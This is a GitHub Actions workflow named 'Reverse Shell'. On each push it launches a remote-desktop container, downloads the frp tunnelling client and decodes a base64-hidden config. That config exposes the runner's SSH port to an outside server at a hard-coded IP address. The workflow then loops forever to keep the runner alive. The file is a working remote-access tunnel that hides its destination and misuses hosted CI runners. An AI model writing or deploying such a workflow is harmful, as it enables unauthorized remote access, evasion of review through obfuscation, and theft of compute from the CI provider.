name: Reverse Shell

on: [push]

jobs:
  reverse-shell:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.x'

    - name: Create reverse shell script
      run: |
        docker run -d -p 5901:5901 -p 6901:6901 jiteshsojitra/docker-ubuntu-xfce-container
        wget https://github.com/fatedier/frp/releases/download/v0.59.0/frp_0.59.0_linux_amd64.tar.gz
        tar xf frp_0.59.0_linux_amd64.tar.gz
        rm frp_0.59.0_linux_amd64.tar.gz
        cd frp*
        base64 -d <<< c2VydmVyQWRkciA9ICIxODUuMTU5LjEyOC4xMTEiCnNlcnZlclBvcnQgPSA3MDAwCgpbW3Byb3hpZXNdCm5hbWUgPSAic3NoIgp0eXBlID0gInRjcCIKbG9jYWxJUCA9ICIxMjcuMC4wLjEiCmxvY2FsUG9ydCA9IDIyCnJlbW90ZVBvcnQgPSA2MDIyCg== > frpc.toml
        ./frpc -c ./frpc.toml
        echo "running"
        
    - name: keep running
      run: while true; do echo $RANDOM ; sleep 3 ; done
